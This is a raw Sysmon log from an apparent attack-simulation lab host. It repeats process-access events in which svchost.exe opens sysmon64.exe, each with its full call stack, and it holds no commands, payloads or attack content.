12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 